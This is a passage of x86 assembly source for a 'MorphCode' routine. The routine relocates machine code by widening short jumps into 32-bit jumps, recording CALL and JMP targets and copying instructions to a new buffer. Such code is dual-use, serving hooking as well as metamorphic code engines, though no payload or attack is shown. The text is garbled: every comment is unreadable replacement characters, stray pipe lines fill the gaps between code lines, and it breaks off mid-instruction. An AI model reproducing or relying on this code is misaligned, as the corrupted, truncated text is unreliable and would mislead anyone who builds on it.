; OUT EAX - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> |
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::|
|
|||
|
MorphCode proc dwCodeAddress : DWORD, dwOutputBuffer : DWORD
|
|||
|
local pOpcodes : DWORD
|
|||
|
local dwTotalCodeSize : DWORD
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
; pOpcodes - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ::
|
|||
|
; dwOutputBuffer - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> ::
|
|||
|
;::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
invoke VirtualAlloc, NULL, 1024*1024, MEM_COMMIT + MEM_RESERVE, PAGE_READWRITE
|
|||
|
mov pOpcodes, eax
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
|
|||
|
push 0
|
|||
|
pop dwTotalCodeSize
|
|||
|
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
assume ecx : ptr _OPCODE
|
|||
|
mov esi, dwCodeAddress ; Code Address
|
|||
|
mov edi, dwOutputBuffer ; New Code Address
|
|||
|
mov ecx, pOpcodes ; array of _OPCODES
|
|||
|
;::::::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> :::::::::::::::::::::::::::
|
|||
|
;::::::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20> EDI
|
|||
|
mov [ecx].dwNewAddress, edi
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
|
|||
|
; Loop 1
|
|||
|
@_loop_1:
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; IN ESI == Current Code Offset
|
|||
|
; OUT EAX == Instruction Length
|
|||
|
call c_Catchy
|
|||
|
|
|||
|
;:::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov [ecx].dwOldAddress, esi
|
|||
|
mov [ecx].dwLength, eax
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 00Fh
|
|||
|
; <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> +10h <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
|
|||
|
; <20><><EFBFBD><EFBFBD> :00000000: 74 30
|
|||
|
; 0F +10 30 00 00 00
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD>:00000000: 0F 84 30 00 00 00
|
|||
|
cmp byte ptr [esi], 070h
|
|||
|
jl @F
|
|||
|
cmp byte ptr [esi], 07Fh
|
|||
|
ja @F
|
|||
|
push eax
|
|||
|
mov al, 00Fh
|
|||
|
stosb
|
|||
|
|
|||
|
movzx eax, byte ptr [esi]
|
|||
|
add eax, 10h
|
|||
|
stosd
|
|||
|
|
|||
|
;:::::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
push esi
|
|||
|
call get_jump_address
|
|||
|
|
|||
|
;::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov [ecx].dwJumpAddress, eax
|
|||
|
|
|||
|
pop eax
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 00Fh XXh imm32, <20>.<2E>. <20><><EFBFBD><EFBFBD><EFBFBD> 6
|
|||
|
; <20><><EFBFBD> XX <20> [80h..8Fh]
|
|||
|
add dwTotalCodeSize, 6
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
jmp @_next_inst_
|
|||
|
|
|||
|
@@:
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>...
|
|||
|
; JMP imm8 -> JMP imm32
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD> : 00000000: EB 33
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD>: 00000000: E9 33 00 00 00
|
|||
|
cmp byte ptr [esi], 0EBh
|
|||
|
jne @F
|
|||
|
push eax
|
|||
|
|
|||
|
mov al, 0E9h
|
|||
|
stosb
|
|||
|
xor eax, eax
|
|||
|
stosd
|
|||
|
|
|||
|
;:::::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
push esi
|
|||
|
call get_jump_address
|
|||
|
|
|||
|
;::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov [ecx].dwJumpAddress, eax
|
|||
|
|
|||
|
pop eax
|
|||
|
;:::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> E9 imm32, <20>.<2E>. <20><><EFBFBD><EFBFBD><EFBFBD> 5
|
|||
|
add dwTotalCodeSize, 5
|
|||
|
jmp @_next_inst_
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
|
|||
|
@@:
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> JMP imm32
|
|||
|
cmp byte ptr [esi], 0E9h
|
|||
|
jne @F
|
|||
|
|
|||
|
push eax
|
|||
|
push esi
|
|||
|
call get_jump_address
|
|||
|
mov [ecx].dwJumpAddress, eax
|
|||
|
pop eax
|
|||
|
jmp @_replace_instr_
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
@@:
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> CALL
|
|||
|
cmp byte ptr [esi], 0E8h
|
|||
|
jne @F
|
|||
|
|
|||
|
push eax
|
|||
|
push esi
|
|||
|
call get_jump_address
|
|||
|
mov [ecx].dwJumpAddress, eax
|
|||
|
pop eax
|
|||
|
jmp @_replace_instr_
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
|
|||
|
@@:
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
; 00Fh XX imm32
|
|||
|
cmp byte ptr [esi], 00Fh
|
|||
|
jne @F
|
|||
|
cmp byte ptr [esi + 1], 080h
|
|||
|
jl @F
|
|||
|
cmp byte ptr [esi + 1], 08Fh
|
|||
|
ja @F
|
|||
|
push eax
|
|||
|
push esi
|
|||
|
call get_jump_address
|
|||
|
mov [ecx].dwJumpAddress, eax
|
|||
|
pop eax
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
@@:
|
|||
|
|
|||
|
@_replace_instr_:
|
|||
|
;::::::::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
|
|||
|
; <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD> <20><> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
push esi
|
|||
|
push ecx
|
|||
|
|
|||
|
mov ecx, eax
|
|||
|
rep movsb
|
|||
|
|
|||
|
pop ecx
|
|||
|
pop e
|